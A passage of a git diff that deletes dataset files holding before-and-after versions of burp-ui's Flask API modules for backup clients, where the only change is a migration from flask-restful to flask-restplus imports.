a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff deleted file mode 100644 index ead3a5c..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/client.py b/burpui/api/client.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/client.py - +++ b/burpui/api/client.py -@@ -10,7 +10,7 @@ - # This is a submodule we can also use "from ..api import api" - from . import api - from ..misc.utils import BUIserverException --from flask.ext.restful import reqparse, Resource -+from flask.ext.restplus import reqparse, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py deleted file mode 100644 index 1796cbc..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py +++ /dev/null @@ -1,358 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.client - :platform: Unix - :synopsis: Burp-UI client api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restful import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/client-tree.json//', - '/api//client-tree.json//', - endpoint='api.client_tree') -class ClientTree(Resource): - """The :class:`burpui.api.client.ClientTree` resource allows you to - retrieve a list of files in a given backup. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``root`` is used to know what path we - are working on. 
- """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('root', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-05-21 14:54:49", - "gid": "0", - "inodes": "173", - "mode": "drwxr-xr-x", - "name": "/", - "parent": "", - "size": "12.0KiB", - "type": "d", - "uid": "0" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name or not backup: # pargma: no cover - return jsonify(results=j) - root = self.parser.parse_args()['root'] - try: - if (api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you are not allowed to view this client') - j = api.bui.cli.get_tree(name, backup, root, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) # pargma: no cover - - -@api.resource('/api/client-stats.json/', - '/api//client-stats.json/', - '/api/client-stats.json//', - '/api//client-stats.json//', - endpoint='api.client_stats') -class ClientStats(Resource): - """The :class:`burpui.api.client.ClientStats` resource allows you to - retrieve a statistics on a given backup for a given client. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. 
- - The *JSON* returned is: - :: - - { - "results": { - "dir": { - "changed": 0, - "deleted": 0, - "new": 394, - "scanned": 394, - "total": 394, - "unchanged": 0 - }, - "duration": 5, - "efs": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "encrypted": true, - "end": 1422189124, - "files": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "files_enc": { - "changed": 0, - "deleted": 0, - "new": 1421, - "scanned": 1421, - "total": 1421, - "unchanged": 0 - }, - "hardlink": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "number": 1, - "received": 1679304, - "softlink": { - "changed": 0, - "deleted": 0, - "new": 1302, - "scanned": 1302, - "total": 1302, - "unchanged": 0 - }, - "special": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "start": 1422189119, - "total": { - "changed": 0, - "deleted": 0, - "new": 3117, - "scanned": 3117, - "total": 3117, - "unchanged": 0 - }, - "totsize": 5345361, - "vssfooter": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssfooter_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "windows": "false" - } - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name: - err = [[1, 'No client defined']] - return jsonify(notif=err) - if (api.bui.acl and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server)): - err = [[2, 'You don\'t have rights to view this client stats']] - return jsonify(notif=err) - if backup: - try: - j = api.bui.cli.get_backup_logs(backup, name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - else: - try: - cl = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - err = [] - for c in cl: - try: - j.append(api.bui.cli.get_backup_logs(c['number'], name, agent=server)) - except BUIserverException as e: - temp = [2, str(e)] - if temp not in err: - err.append(temp) - if err: - return jsonify(notif=err) - return jsonify(results=j) - - -@api.resource('/api/client.json/', - '/api//client.json/', - endpoint='api.client_report') -class ClientReport(Resource): - """The :class:`burpui.api.client.ClientReport` resource allows you to - retrieve a list of backups for a given client. - - This resource is part of the :mod:`burpui.api.client` module. 
- - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-01-25 13:32:00", - "deletable": true, - "encrypted": true, - "number": "1" - } - ] - } - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - try: - if (api.bui.acl and ( - not api.bui.acl.is_admin(current_user.get_id()) and - not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you cannot access this client') - j = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py deleted file mode 100644 index ad1862c..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py +++ /dev/null @@ -1,358 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.client - :platform: Unix - :synopsis: Burp-UI client api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restplus import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/client-tree.json//', - '/api//client-tree.json//', - endpoint='api.client_tree') -class ClientTree(Resource): - """The :class:`burpui.api.client.ClientTree` resource allows you to - retrieve a list of files in a given backup. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``root`` is used to know what path we - are working on. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('root', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-05-21 14:54:49", - "gid": "0", - "inodes": "173", - "mode": "drwxr-xr-x", - "name": "/", - "parent": "", - "size": "12.0KiB", - "type": "d", - "uid": "0" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. 
- """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name or not backup: # pargma: no cover - return jsonify(results=j) - root = self.parser.parse_args()['root'] - try: - if (api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you are not allowed to view this client') - j = api.bui.cli.get_tree(name, backup, root, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) # pargma: no cover - - -@api.resource('/api/client-stats.json/', - '/api//client-stats.json/', - '/api/client-stats.json//', - '/api//client-stats.json//', - endpoint='api.client_stats') -class ClientStats(Resource): - """The :class:`burpui.api.client.ClientStats` resource allows you to - retrieve a statistics on a given backup for a given client. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": { - "dir": { - "changed": 0, - "deleted": 0, - "new": 394, - "scanned": 394, - "total": 394, - "unchanged": 0 - }, - "duration": 5, - "efs": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "encrypted": true, - "end": 1422189124, - "files": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "files_enc": { - "changed": 0, - "deleted": 0, - "new": 1421, - "scanned": 1421, - "total": 1421, - "unchanged": 0 - }, - "hardlink": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "number": 1, - "received": 1679304, - "softlink": { - "changed": 0, - "deleted": 0, - "new": 1302, - "scanned": 1302, - "total": 1302, - "unchanged": 0 - }, - "special": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "start": 1422189119, - "total": { - "changed": 0, - "deleted": 0, - "new": 3117, - "scanned": 3117, - "total": 3117, - "unchanged": 0 - }, - "totsize": 5345361, - "vssfooter": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssfooter_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "windows": "false" - } - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. 
- - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name: - err = [[1, 'No client defined']] - return jsonify(notif=err) - if (api.bui.acl and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server)): - err = [[2, 'You don\'t have rights to view this client stats']] - return jsonify(notif=err) - if backup: - try: - j = api.bui.cli.get_backup_logs(backup, name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - else: - try: - cl = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - err = [] - for c in cl: - try: - j.append(api.bui.cli.get_backup_logs(c['number'], name, agent=server)) - except BUIserverException as e: - temp = [2, str(e)] - if temp not in err: - err.append(temp) - if err: - return jsonify(notif=err) - return jsonify(results=j) - - -@api.resource('/api/client.json/', - '/api//client.json/', - endpoint='api.client_report') -class ClientReport(Resource): - """The :class:`burpui.api.client.ClientReport` resource allows you to - retrieve a list of backups for a given client. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-01-25 13:32:00", - "deletable": true, - "encrypted": true, - "number": "1" - } - ] - } - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - try: - if (api.bui.acl and ( - not api.bui.acl.is_admin(current_user.get_id()) and - not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you cannot access this client') - j = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff deleted file mode 100644 index b618d0b..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/clients.py b/burpui/api/clients.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/clients.py - +++ b/burpui/api/clients.py -@@ -12,7 +12,7 @@ from . 
import api - from ..misc.utils import BUIserverException - - from future.utils import iteritems --from flask.ext.restful import reqparse, Resource -+from flask.ext.restplus import reqparse, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py deleted file mode 100644 index cb66918..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py +++ /dev/null @@ -1,314 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.clients - :platform: Unix - :synopsis: Burp-UI clients api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restful import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/running-clients.json', - '/api//running-clients.json', - '/api/running-clients.json/', - '/api//running-clients.json/', - endpoint='api.running_clients') -class RunningClients(Resource): - """The :class:`burpui.api.clients.RunningClients` resource allows you to - retrieve a list of clients that are currently running a backup. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, client=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param client: Ask a specific client in order to know if it is running a backup - :type client: str - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - if client: - if api.bui.acl: - if (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - client, - server)): - r = [] - return jsonify(results=r) - if api.bui.cli.is_backup_running(client, server): - r = [client] - return jsonify(results=r) - else: - r = [] - return jsonify(results=r) - - r = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(r, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in r[serv] if x in allowed] - r = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - r = [x for x in r if x in allowed] - return jsonify(results=r) - - -@api.resource('/api/running.json', - '/api//running.json', - endpoint='api.running_backup') -class RunningBackup(Resource): - """The :class:`burpui.api.clients.RunningBackup` resource allows you to - access the status of the server in order to know if there is a running - backup currently. - - This resource is part of the :mod:`burpui.api.clients` module. 
- """ - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": false - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. - """ - j = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(j, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in j[serv] if x in allowed] - j = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - j = [x for x in j if x in allowed] - r = False - if isinstance(j, dict): - for (k, v) in iteritems(j): - if r: - break - r = r or (len(v) > 0) - else: - r = len(j) > 0 - return jsonify(results=r) - - -@api.resource('/api/clients-report.json', - '/api//clients-report.json', - endpoint='api.clients_report') -class ClientsReport(Resource): - """The :class:`burpui.api.clients.ClientsReport` resource allows you to - access general reports about your clients. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "backups": [ - { - "name": "client1", - "number": 15 - }, - { - "name": "client2", - "number": 1 - } - ], - "clients": [ - { - "name": "client1", - "stats": { - "total": 296377, - "totsize": 57055793698, - "windows": "false" - } - }, - { - "name": "client2", - "stats": { - "total": 3117, - "totsize": 5345361, - "windows": "true" - } - } - ] - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - j = [] - try: - # Manage ACL - if (not api.bui.standalone and api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have rights on this server') - clients = api.bui.cli.get_all_clients(agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - # Filter only allowed clients - allowed = [] - check = False - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.clients(current_user.get_id(), server) - aclients = [] - for c in clients: - if check and c['name'] not in allowed: - continue - aclients.append(c) - j = api.bui.cli.get_clients_report(aclients, server) - return jsonify(results=j) - - -@api.resource('/api/clients.json', - '/api//clients.json', - endpoint='api.clients_stats') -class ClientsStats(Resource): - """The :class:`burpui.api.clients.ClientsStats` resource allows you to - access general statistics about your clients. 
- - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "last": "2015-05-17 11:40:02", - "name": "client1", - "state": "idle" - }, - { - "last": "never", - "name": "client2", - "state": "idle" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - try: - if (not api.bui.standalone and - api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have any rights on this server') - j = api.bui.cli.get_all_clients(agent=server) - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - j = [x for x in j if x['name'] in api.bui.acl.clients(current_user.get_id(), server)] - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py deleted file mode 100644 index 9c6c66e..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py +++ /dev/null @@ -1,314 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.clients - :platform: Unix - :synopsis: Burp-UI clients api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restplus import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/running-clients.json', - '/api//running-clients.json', - '/api/running-clients.json/', - '/api//running-clients.json/', - endpoint='api.running_clients') -class RunningClients(Resource): - """The :class:`burpui.api.clients.RunningClients` resource allows you to - retrieve a list of clients that are currently running a backup. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, client=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param client: Ask a specific client in order to know if it is running a backup - :type client: str - - :returns: The *JSON* described above. 
- """ - if not server: - server = self.parser.parse_args()['server'] - if client: - if api.bui.acl: - if (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - client, - server)): - r = [] - return jsonify(results=r) - if api.bui.cli.is_backup_running(client, server): - r = [client] - return jsonify(results=r) - else: - r = [] - return jsonify(results=r) - - r = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(r, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in r[serv] if x in allowed] - r = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - r = [x for x in r if x in allowed] - return jsonify(results=r) - - -@api.resource('/api/running.json', - '/api//running.json', - endpoint='api.running_backup') -class RunningBackup(Resource): - """The :class:`burpui.api.clients.RunningBackup` resource allows you to - access the status of the server in order to know if there is a running - backup currently. - - This resource is part of the :mod:`burpui.api.clients` module. - """ - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": false - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. - """ - j = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(j, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in j[serv] if x in allowed] - j = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - j = [x for x in j if x in allowed] - r = False - if isinstance(j, dict): - for (k, v) in iteritems(j): - if r: - break - r = r or (len(v) > 0) - else: - r = len(j) > 0 - return jsonify(results=r) - - -@api.resource('/api/clients-report.json', - '/api//clients-report.json', - endpoint='api.clients_report') -class ClientsReport(Resource): - """The :class:`burpui.api.clients.ClientsReport` resource allows you to - access general reports about your clients. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "backups": [ - { - "name": "client1", - "number": 15 - }, - { - "name": "client2", - "number": 1 - } - ], - "clients": [ - { - "name": "client1", - "stats": { - "total": 296377, - "totsize": 57055793698, - "windows": "false" - } - }, - { - "name": "client2", - "stats": { - "total": 3117, - "totsize": 5345361, - "windows": "true" - } - } - ] - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. 
- - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - j = [] - try: - # Manage ACL - if (not api.bui.standalone and api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have rights on this server') - clients = api.bui.cli.get_all_clients(agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - # Filter only allowed clients - allowed = [] - check = False - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.clients(current_user.get_id(), server) - aclients = [] - for c in clients: - if check and c['name'] not in allowed: - continue - aclients.append(c) - j = api.bui.cli.get_clients_report(aclients, server) - return jsonify(results=j) - - -@api.resource('/api/clients.json', - '/api//clients.json', - endpoint='api.clients_stats') -class ClientsStats(Resource): - """The :class:`burpui.api.clients.ClientsStats` resource allows you to - access general statistics about your clients. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "last": "2015-05-17 11:40:02", - "name": "client1", - "state": "idle" - }, - { - "last": "never", - "name": "client2", - "state": "idle" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - try: - if (not api.bui.standalone and - api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have any rights on this server') - j = api.bui.cli.get_all_clients(agent=server) - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - j = [x for x in j if x['name'] in api.bui.acl.clients(current_user.get_id(), server)] - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff deleted file mode 100644 index 298cca9..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/misc.py b/burpui/api/misc.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/misc.py - +++ b/burpui/api/misc.py -@@ -12,7 +12,7 @@ from . 
